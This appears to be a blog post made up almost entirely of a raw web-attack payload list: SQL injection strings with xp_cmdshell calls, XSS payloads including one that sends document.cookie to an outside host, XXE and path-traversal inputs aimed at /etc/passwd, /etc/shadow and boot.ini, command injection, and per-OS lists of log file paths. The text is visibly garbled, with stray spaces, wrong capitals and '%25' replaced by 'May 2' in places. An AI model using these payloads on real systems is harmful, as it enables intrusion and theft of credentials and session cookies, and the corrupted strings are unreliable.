"Or 0 = 0 -
or 0 = 0 -
'Or 0 = 0 #
"Or 0 = 0 #
or 0 = 0 #
'Or 1 = 1 -
"Or 1 = 1 -
'Or '1' = '1 '-
"'Or 1 -'"
or 1 = 1 -
or% 201 = 1
or% 201 = 1 -
'Or 1 = 1 or''='
"Or 1 = 1 or" "="
'Or a = a -
"Or" a "=" a
') Or (' a '=' a
") Or (" a "=" a
hi "or" a "=" a
hi "or 1 = 1 -
hi 'or 1 = 1 -
hi 'or' a '=' a
hi ') or (' a '=' a
hi ") or (" a "=" a
'Hi' or 'x' = 'x';
@ Variable
, @ Variable
PRINT
PRINT @ @ variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
'Or username like'%
'Or uname like'%
'Or userid like'%
'Or uid like'%
'Or user like'%
exec xp
exec sp
'; Exec master .. xp_cmdshell
'; Exec xp_regread
t'exec master .. xp_cmdshell 'nslookup www.google.com' -
- Sp_password
\ X27UNION SELECT
'UNION SELECT
'UNION ALL SELECT
'Or (EXISTS)
'(Select top 1
'| | UTL_HTTP.REQUEST
1; SELECT% 20 *
to_timestamp_tz
tz_offset
<>"'%;)(&+
'% 20or% 201 = 1
% 27% 20or% 201 = 1
% 20 $ (sleep% 2050)
% 20'sleep% in 2050 '
char% 4039% 41% 2b% 40SELECT
'% 20OR
'Sqlattempt1
(Sqlattempt2)
|
% 7C
* |
% 2A% 7C
* (| (Mail =*))
% 2A% 28% 7C% 28mail% 3D% 2A% 29% 29
* (| (Objectclass =*))
% 2A% 28% 7C% 28objectclass% 3D% 2A% 29% 29
(
28%
)
29%
&
26%
!
21%
'Or 1 = 1 or''='
'Or''='
x 'or 1 = 1 or' x '=' y
/
/ /
/ / *
* / *


XSS

"> <script>"
<script> alert ("XSS") </ script>
<<script> Alert ("XSS ");//<</ script>
<script> alert (document.cookie) </ script>
'> <script> Alert (document.cookie) </ script>
'> <script> Alert (document.cookie); </ script>
\ "; Alert ('XSS');//
% 3cscript% 3ealert ("XSS");% 3c/script% 3e
% 3cscript% 3ealert (document.cookie);% 3c% 2fscript% 3e
% 3Cscript% 3Ealert (% 22X% 20SS% 22);% 3C/script% 3E
& Ltscript & gtalert (document.cookie); </ script>
& Ltscript & gtalert (document.cookie); & ltscript & gtale rt
<xss> <script> alert ('XSS') </ script> </ vulnerable>
<IMG% 20SRC = 'javascript: Alert (document.cookie) '>
<IMG SRC = "javascript: Alert ('XSS');">
<IMG SRC = "javascript: Alert ('XSS') "
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascript: Alert ("XSS")>
<IMG SRC = `javascript: Alert ("'XSS'")`>
<IMG """> <SCRIPT> Alert ("XSS") </ SCRIPT> ">
<IMG SRC = javascript: Alert (String.fromCharCode (88,83,83))>
<IMG%20SRC='javasc Ript:alert(document.cookie)'>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC = "javascript: Alert ('XSS');">
<IMG DYNSRC = "javascript: Alert ('XSS') ">
<IMG LOWSRC = "javascript: Alert ('XSS') ">
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%2 3x6c;ert(document.%26%23x63;ookie)'>
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascrip & # x74: alert ('X & # x53S' & # x29>
'% 3CIFRAME% 20SRC = javascript: Alert (% 2527XSS% 2527)% 3 E% 3C/IFRAME% 3E
"> <script> Document.location = 'http://your.site.com/cgi-bin/cookie.cgi?' + Document.cookie </ script>
% 22% 3E% 3Cscript% 3Edocument% 2Elocation% 3D% 27http% 3A% 2F% 2Fyour% 2Esite% 2Ecom% 2Fcgi% 2Dbin% 2Fcookie% 2Ecgi% 3F%

27% 20% 2Bdocument% 2Ecookie% 3C% 2Fscript% 3E

'';!--"< XSS >=&{()}



XML

count (/ child:: node ())
x 'or name () =' username 'or' x '=' y
<name>','')); phpinfo (); exit ;/*</ name>
<! [CDATA [<script> var n = 0; while (true) {n ++;}</ script>]]>
<! [CDATA [<]]> SCRIPT <! [CDATA [>]]> alert ('XSS');<![ CDATA [<]]>/ SCRIPT <! [CDATA [>]]>
<? Xml version = "1.0"
<? Xml version = "1.0" encoding = "ISO-8859-1"?> <foo> <! [CDATA ['or 1 = 1 or''=']]></ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file: / / c: /

boot.ini ">]> <foo> &xxe; </ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file ://// etc /

passwd ">]>< foo> &xxe; </ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file ://// etc /

shadow ">]>< foo> &xxe; </ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file ://// dev /

random ">]>< foo> &xxe; </ foo>
<xml ID=I> <X> <C> <! [CDATA [<IMG SRC="javas]]> <! [CDATA [cript: alert ('XSS');">]]>
<xml ID="xss"> <I> <B> <IMG SRC = "javas <! - -> cript: alert ('XSS')"></ B> </ I> </ xml > <SPAN DATASRC="#xss"

DATAFLD="B" DATAFORMATAS="HTML"> </ SPAN> </ C> </ X> </ xml> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> < / SPAN>
<xml SRC="xsstest.xml" ID=I> </ xml> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> </ SPAN>
<HTML Xmlns:xss> <? Import namespace = "xss" implementation = "http://ha.ckers.org/xss.htc"> <xss:xss> XSS </ xss: xss> </

HTML>



Traversal

.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / hosts% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / hosts
.. / .. / Boot.ini
/../../../../../../../../% 2A
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / passwd% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / passwd
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / shadow% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / shadow
/../../../../../../../../../../ Etc / passwd ^ ^
/../../../../../../../../../../ Etc / shadow ^ ^
/../../../../../../../../../../ Etc / passwd
/../../../../../../../../../../ Etc / shadow
/./././././././././././ Etc / passwd
/./././././././././././ Etc / shadow
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow
/ .. \ ../.. \ ../.. \ ../.. \ ../.. \ ../.. \ .. / Etc / passwd
/ .. \ ../.. \ ../.. \ ../.. \ ../.. \ ../.. \ .. / Etc / shadow
. \ \. /. \ \. /. \ \. /. \ \. /. \ \. /. \ \. / Etc / passwd
. \ \. /. \ \. /. \ \. /. \ \. /. \ \. /. \ \. / Etc / shadow
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd% 00
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow% 00
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd% 00
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow% 00
% 0a/bin/cat% 20/etc/passwd
% 0a/bin/cat% 20/etc/shadow
00% 00/etc/passwd%
00% 00/etc/shadow%
% 00../../../../../../etc/passwd
% 00../../../../../../etc/shadow
/../../../../../../../../../../../ Etc / passwd% 00.jpg
/../../../../../../../../../../../ Etc / passwd% 00.html
/ ..% C0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0 % af.. / etc / passwd
/ ..% C0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0 % af.. / etc / shadow
/% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e / etc / passwd
/% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e / etc / shadow
% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 00
/% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c .. % 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 00
% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 00
% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 255cboot.ini
/% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c .. % 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c..winnt/desktop.ini
\ \ '/ Bin / cat% 20/etc/passwd \ \'
\ \ '/ Bin / cat% 20/etc/shadow \ \'
.. / .. / .. / .. / .. / .. / .. / .. / Conf / server.xml
/../../../../../../../../ Bin / id |
C: / inetpub / wwwroot / global.asa
C: \ inetpub \ wwwroot \ global.asa
C: / boot.ini
C: \ boot.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Localstart.asp% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Localstart.asp
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Boot.ini% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Boot.ini
/./././././././././././ Boot.ini
/../../../../../../../../../../../ Boot.ini% 00
/../../../../../../../../../../../ Boot.ini
/ .. \ ../.. \ ../.. \ ../.. \ ../.. \ ../.. \ .. / Boot.ini
/. \ \. /. \ \. /. \ \. /. \ \. /. \ \. /. \ \. / Boot.ini
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Boot.ini
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Boot.ini% 00
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Boot.ini
/../../../../../../../../../../../ Boot.ini% 00.html
/../../../../../../../../../../../ Boot.ini% 00.jpg
/.../.../.../.../.../
..% C0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af.. / boot.ini
/% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e / boot.ini
 


IRIX:

/ Var / adm / SYSLOG
/ Var / adm / sulog
/ Var / adm / utmp
/ Var / adm / utmpx
/ Var / adm / wtmp
/ Var / adm / wtmpx
/ Var / adm / lastlog / username
/ Usr / spool / lp / log
/ Var / adm / lp / lpd-errs
/ Usr / lib / cron / log
/ Var / adm / loginlog
/ Var / adm / pacct
/ Var / adm / dtmp
/ Var / adm / acct / sum / loginlog
/ Var/adm/X0msgs
/ Var / adm / crash / vmcore
/ Var / adm / crash / unix

AIX:

/ Var / adm / pacct
/ Var / adm / wtmp
/ Var / adm / dtmp
/ Var / adm / qacct
/ Var / adm / sulog
/ Var / adm / ras / errlog
/ Var / adm / ras / bootlog
/ Var / adm / cron / log
/ Etc / utmp
/ Etc / security / lastlog
/ Etc / security / failedlogin
/ Usr / spool / mqueue / syslog

SunOS:

/ Var / adm / messages
/ Var / adm / aculogs
/ Var / adm / aculog
/ Var / adm / sulog
/ Var / adm / vold.log
/ Var / adm / wtmp
/ Var / adm / wtmpx
/ Var / adm / utmp
/ Var / adm / utmpx
/ Var / adm / log / asppp.log
/ Var / log / syslog
/ Var / log / POPlog
/ Var / log / authlog
/ Var / adm / pacct
/ Var / lp / logs / lpsched
/ Var / lp / logs / lpNet
/ Var / lp / logs / requests
/ Var / cron / log
/ Var / saf / _log
/ Var / saf / port / log

Linux:

/ Var / log / lastlog
/ Var / log / telnetd
/ Var / run / utmp
/ Var / log / secure
/ Root / .ksh_history
/ Root / .bash_history
/ Root / .bash_logut
/ Var / log / wtmp
/ Etc / wtmp
/ Var / run / utmp
/ Etc / utmp
/ Var / log
/ Var / adm
/ Var / apache / log
/ Var / apache / logs
/ Usr / local / apache / log
/ Usr / local / apache / logs
/ Var / log / acct
/ Var / log / xferlog
/ Var / log / messages
/ Var / log / proftpd / xferlog.legacy
/ Var / log / proftpd.access_log
/ Var / log / proftpd.xferlog
/ Var / log / httpd / error_log
/ Var / log / httpd / access_log
/ Etc / httpd / logs / access_log
/ Etc / httpd / logs / error_log
/ Var / log / httpsd / ssl.access_log
/ Var / log / httpsd / ssl_log
/ Var / log / httpsd / ssl.access_log
/ Etc / mail / access
/ Var / log / qmail
/ Var / log / smtpd
/ Var / log / samba
/ Var / log / samba-log.% M
/ Var / lock / samba
/ Root / .Xauthority
/ Var / log / poplog
/ Var / log / news.all
/ Var / log / spooler
/ Var / log / news
/ Var / log / news / news
/ Var / log / news / news.all
/ Var / log / news / news.crit
/ Var / log / news / news.err
/ Var / log / news / news.notice
/ Var / log / news / suck.err
/ Var / log / news / suck.notice
/ Var / spool / tmp
/ Var / spool / errors
/ Var / spool / logs
/ Var / spool / locks
/ Usr / local / www / logs / thttpd_log
/ Var / log / thttpd_log
/ Var / log / ncftpd / misclog.txt
/ Var / log / ncftpd.errs
/ Var / log / auth

Red Hat, Mac OS X

/ Var / log / httpd / access_log
/ Var / log / httpd / error_log

Solaris

/ Var / apache / logs / access_log
/ Var / apache / logs / error_log

SuSE Linux Enterprise Server

/ Var / log / httpd / access_log
/ Var / log / httpd / error_log

Lampp


/ Opt / lampp / logs / error_log
/ Opt / lampp / logs / access_log

Debian


/ Var / log / apache / access.log
/ Var / log / apache / error.log
/ Var / log / apache-ssl / error.log
/ Var / log / apache-ssl / access.log

FreeBSD

/ Usr / local / etc / httpd / logs / access_log
/ Usr / local / etc / httpd / logs / error_log

OpenBSD

/ Var / www / log / access_log
/ Var / www / log / error_log
Posted by Unknown at 22:50 0 comments
Labels: , , , , ,
Subscribe to: Posts (Atom)